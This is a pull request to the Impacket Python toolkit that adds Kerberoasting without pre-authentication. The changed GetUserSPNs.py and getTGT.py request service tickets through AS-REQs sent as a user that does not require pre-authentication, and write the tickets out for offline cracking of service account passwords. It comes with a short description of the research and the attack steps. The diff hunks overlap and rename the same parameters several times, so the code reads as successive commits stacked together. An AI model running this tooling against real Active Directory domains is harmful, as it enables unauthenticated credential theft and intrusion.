### PR TITLE
Support for Kerberoasting without pre-authentication and ST request through AS-REQ

### DIFF
--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -80,7 +80,7 @@ class GetUserSPNs:
         self.__targetDomain = target_domain
         self.__lmhash = ''
         self.__nthash = ''
-        self.__preauth = cmdLineOptions.preauth
+        self.__no_preauth = cmdLineOptions.no_preauth
         self.__outputFileName = cmdLineOptions.outputfile
         self.__usersFile = cmdLineOptions.usersfile
         self.__aesKey = cmdLineOptions.aesKey
@@ -176,7 +176,7 @@ class GetUserSPNs:
         return TGT
 
     def outputTGS(self, ticket, oldSessionKey, sessionKey, username, spn, fd=None):
-        if self.__preauth:
+        if self.__no_preauth:
             decodedTGS = decoder.decode(ticket, asn1Spec=AS_REP())[0]
         else:
             decodedTGS = decoder.decode(ticket, asn1Spec=TGS_REP())[0]
@@ -420,7 +420,7 @@ class GetUserSPNs:
         self.request_multiple_TGSs(usernames)
 
     def request_multiple_TGSs(self, usernames):
-        if self.__preauth:
+        if self.__no_preauth:
             if self.__outputFileName is not None:
                 fd = open(self.__outputFileName, 'w+')
             else:
@@ -428,8 +428,8 @@ class GetUserSPNs:
 
             for username in usernames:
                 try:
-                    preauth_pincipal = Principal(self.__preauth, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
-                    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=preauth_pincipal,
+                    no_preauth_pincipal = Principal(self.__no_preauth, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+                    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=no_preauth_pincipal,
                                                                             password=self.__password,
                                                                             domain=self.__domain,
                                                                             lmhash=(self.__lmhash),
@@ -483,7 +483,7 @@ if __name__ == '__main__':
     parser.add_argument('-target-domain', action='store',
                         help='Domain to query/request if different than the domain of the user. '
                              'Allows for Kerberoasting across trusts.')
-    parser.add_argument('-preauth', action='store', help='account that does not require preauth, to obtain Service Ticket'
+    parser.add_argument('-no-preauth', action='store', help='account that does not require preauth, to obtain Service Ticket'
                                                          ' through the AS')
     parser.add_argument('-usersfile', help='File with user per line to test')
     parser.add_argument('-request', action='store_true', default=False, help='Requests TGS for users and output them '

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -447,7 +447,8 @@ class GetUserSPNs:
                                                                             nthash=(self.__nthash),
                                                                             aesKey=self.__aesKey,
                                                                             kdcHost=self.__kdcHost,
-                                                                            service=username)
+                                                                            service=username,
+                                                                            kerberoast_no_preauth=True)
                     self.outputTGS(tgt, oldSessionKey, sessionKey, username, username, fd)
                 except Exception as e:
                     logging.debug("Exception:", exc_info=True)

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -527,6 +527,11 @@ if __name__ == '__main__':
     # Init the example's logger theme
     logger.init(options.ts)
 
+    if options.no_preauth and options.usersfile is None:
+        logging.error('You have to specify -usersfile when -no-preauth is supplied. Usersfile must contain'
+                      ' a list of SPNs and/or sAMAccountNames to Kerberoast.')
+        sys.exit(1)
+
     if options.debug is True:
         logging.getLogger().setLevel(logging.DEBUG)
         # Print the Library's installation path

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -447,7 +447,7 @@ class GetUserSPNs:
                                                                             nthash=(self.__nthash),
                                                                             aesKey=self.__aesKey,
                                                                             kdcHost=self.__kdcHost,
-                                                                            service=username,
+                                                                            serverName=username,
                                                                             kerberoast_no_preauth=True)
                     self.outputTGS(tgt, oldSessionKey, sessionKey, username, username, fd)
                 except Exception as e:

--- a/examples/GetUserSPNs.py
+++ b/examples/GetUserSPNs.py
@@ -45,7 +45,7 @@ from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION
 from impacket.examples import logger
 from impacket.examples.utils import parse_credentials
 from impacket.krb5 import constants
-from impacket.krb5.asn1 import TGS_REP
+from impacket.krb5.asn1 import TGS_REP, AS_REP
 from impacket.krb5.ccache import CCache
 from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
 from impacket.krb5.types import Principal
@@ -80,6 +80,7 @@ class GetUserSPNs:
         self.__targetDomain = target_domain
         self.__lmhash = ''
         self.__nthash = ''
+        self.__preauth = cmdLineOptions.preauth
         self.__outputFileName = cmdLineOptions.outputfile
         self.__usersFile = cmdLineOptions.usersfile
         self.__aesKey = cmdLineOptions.aesKey
@@ -174,9 +175,7 @@ class GetUserSPNs:
 
         return TGT
 
-    def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
-        decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
-
+    def outputTGS(self, decodedTGS, oldSessionKey, sessionKey, username, spn, fd=None):
         # According to RFC4757 (RC4-HMAC) the cipher part is like:
         # struct EDATA {
         #       struct HEADER {
@@ -417,31 +416,59 @@ class GetUserSPNs:
         self.request_multiple_TGSs(usernames)
 
     def request_multiple_TGSs(self, usernames):
-        # Get a TGT for the current user
-        TGT = self.getTGT()
+        if self.__preauth:
+            if self.__outputFileName is not None:
+                fd = open(self.__outputFileName, 'w+')
+            else:
+                fd = None
 
-        if self.__outputFileName is not None:
-            fd = open(self.__outputFileName, 'w+')
+            for username in usernames:
+                try:
+                    preauth_pincipal = Principal(self.__preauth, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+                    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=preauth_pincipal,
+                                                                            password=self.__password,
+                                                                            domain=self.__domain,
+                                                                            lmhash=(self.__lmhash),
+                                                                            nthash=(self.__nthash),
+                                                                            aesKey=self.__aesKey,
+                                                                            kdcHost=self.__kdcHost,
+                                                                            service=username)
+                    asRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+
+                    self.outputTGS(asRep, oldSessionKey, sessionKey, username, username, fd)
+                except Exception as e:
+                    logging.debug("Exception:", exc_info=True)
+                    logging.error('Principal: %s - %s' % (username, str(e)))
+
+            if fd is not None:
+                fd.close()
         else:
-            fd = None
+            # Get a TGT for the current user
+            TGT = self.getTGT()
 
-        for username in usernames:
-            try:
-                principalName = Principal()
-                principalName.type = constants.PrincipalNameType.NT_ENTERPRISE.value
-                principalName.components = [username]
+            if self.__outputFileName is not None:
+                fd = open(self.__outputFileName, 'w+')
+            else:
+                fd = None
 
-                tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
-                                                                        self.__kdcHost,
-                                                                        TGT['KDC_REP'], TGT['cipher'],
-                                                                        TGT['sessionKey'])
-                self.outputTGS(tgs, oldSessionKey, sessionKey, username, username, fd)
-            except Exception as e:
-                logging.debug("Exception:", exc_info=True)
-                logging.error('Principal: %s - %s' % (username, str(e)))
+            for username in usernames:
+                try:
+                    principalName = Principal()
+                    principalName.type = constants.PrincipalNameType.NT_ENTERPRISE.value
+                    principalName.components = [username]
 
-        if fd is not None:
-            fd.close()
+                    tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
+                                                                            self.__kdcHost,
+                                                                            TGT['KDC_REP'], TGT['cipher'],
+                                                                            TGT['sessionKey'])
+                    decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
+                    self.outputTGS(decodedTGS, oldSessionKey, sessionKey, username, username, fd)
+                except Exception as e:
+                    logging.debug("Exception:", exc_info=True)
+                    logging.error('Principal: %s - %s' % (username, str(e)))
+
+            if fd is not None:
+                fd.close()
 
 
 # Process command-line arguments.
@@ -455,6 +482,8 @@ if __name__ == '__main__':
     parser.add_argument('-target-domain', action='store',
                         help='Domain to query/request if different than the domain of the user. '
                              'Allows for Kerberoasting across trusts.')
+    parser.add_argument('-preauth', action='store', help='account that does not require preauth, to obtain Service Ticket'
+                                                         ' through the AS')
     parser.add_argument('-usersfile', help='File with user per line to test')
     parser.add_argument('-request', action='store_true', default=False, help='Requests TGS for users and output them '
                                                                              'in JtR/hashcat format (default False)')

--- a/examples/getTGT.py
+++ b/examples/getTGT.py
@@ -42,6 +42,7 @@ class GETTGT:
         self.__aesKey = options.aesKey
         self.__options = options
         self.__kdcHost = options.dc_ip
+        self.__service = options.service
         if options.hashes is not None:
             self.__lmhash, self.__nthash = options.hashes.split(':')
 
@@ -55,9 +56,14 @@ class GETTGT:
 
     def run(self):
         userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
-        tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
-                                                                unhexlify(self.__lmhash), unhexlify(self.__nthash), self.__aesKey,
-                                                                self.__kdcHost)
+        tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName = userName,
+                                                                password = self.__password,
+                                                                domain = self.__domain,
+                                                                lmhash = unhexlify(self.__lmhash),
+                                                                nthash = unhexlify(self.__nthash),
+                                                                aesKey = self.__aesKey,
+                                                                kdcHost = self.__kdcHost,
+                                                                service = self.__service)
         self.saveTicket(tgt,oldSessionKey)
 
 if __name__ == '__main__':
@@ -80,6 +86,7 @@ if __name__ == '__main__':
                                                                             '(128 or 256 bits)')
     group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                        'ommited it use the domain part (FQDN) specified in the target parameter')
+    group.add_argument('-service', action='store', metavar="SPN", help='Request a Service Ticket directly through an AS-REQ')
 
     if len(sys.argv)==1:
         parser.print_help()

--- a/examples/getTGT.py
+++ b/examples/getTGT.py
@@ -63,7 +63,7 @@ class GETTGT:
                                                                 nthash = unhexlify(self.__nthash),
                                                                 aesKey = self.__aesKey,
                                                                 kdcHost = self.__kdcHost,
-                                                                service = self.__service)
+                                                                serverName = self.__service)
         self.saveTicket(tgt,oldSessionKey)
 
 if __name__ == '__main__':

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -114,7 +114,7 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     asReq = AS_REQ()
 
     domain = domain.upper()
-    if service == '':
+    if service == '' or service is None:
         serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
     else:
         serverName = Principal(service, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -124,7 +124,7 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
     if serverName is None:
         serverName = Principal('krbtgt/%s'%domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
     else:
-        serverName = Principal(service, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        serverName = Principal(serverName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 
     pacRequest = KERB_PA_PAC_REQUEST()
     pacRequest['include-pac'] = requestPAC


### PR DESCRIPTION
@0xe7 published some research on how Service Tickets can be requested through AS-REQs. This, among other things, allows for Kerberoasting attacks through an unauthenticated position by relying on a user configured without pre-authentication.

The "Kerberoasting without pre-authentication" process goes as follows:
1. **user** = a user that doesn't require pre-authentication
2. **service** = target service (defined by its name or spn) to kerberoast
3. AS-REQ, without pre-auth, as "user", to obtain a ticket for **service**
4. Ticket obtained can't be used but relevant information can be extracted for cracking attempt to recover the password/NT hash for **service**

I also modified getTGT.py and the kerberosv5.py lib to allow getTGT to be used to request service tickets.

The Hacker Recipes : https://www.thehacker.recipes/ad/movement/kerberos/kerberoast#kerberoast-w-o-pre-authentication

![image](https://user-images.githubusercontent.com/40902872/192773898-09071e1b-ef78-4e44-ae5f-ff99f34fe1bd.png)
